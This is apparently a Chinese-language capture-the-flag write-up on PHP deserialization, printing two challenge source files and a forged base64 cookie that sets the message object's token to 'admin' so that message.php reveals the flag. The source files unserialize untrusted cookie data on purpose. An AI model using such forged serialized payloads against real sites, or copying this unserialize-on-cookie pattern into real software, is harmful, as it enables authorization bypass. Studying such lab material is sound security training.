在index.php里面,我其实没有发现有什么可以利用的点,看了wp后才发现有message.php
index.php 源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset($m) && isset($t)){
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
setcookie('msg',base64_encode($umsg));
echo 'Your message has been sent';
}
highlight_file(__FILE__);
message.php 源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 15:13:03
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include('flag.php');
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
if(isset($_COOKIE['msg'])){
$msg = unserialize(base64_decode($_COOKIE['msg']));
if($msg->token=='admin'){
echo $flag;
}
}
这题我们伪造一个cookie即可PHP反序列化字符串逃逸
O:7:"message":4:{s:4:"from";s:0:"";s:3:"msg";s:0:"";s:2:"to";s:0:"";s:5:"token";s:5:"admin";}
==>
Tzo3OiJtZXNzYWdlIjo0OntzOjQ6ImZyb20iO3M6MDoiIjtzOjM6Im1zZyI7czowOiIiO3M6MjoidG8iO3M6MDoiIjtzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9
==>
msg=Tzo3OiJtZXNzYWdlIjo0OntzOjQ6ImZyb20iO3M6MDoiIjtzOjM6Im1zZyI7czowOiIiO3M6MjoidG8iO3M6MDoiIjtzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9
==>
payload:cookies
msg=Tzo3OiJtZXNzYWdlIjo0OntzOjQ6ImZyb20iO3M6MDoiIjtzOjM6Im1zZyI7czowOiIiO3M6MjoidG8iO3M6MDoiIjtzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9%3D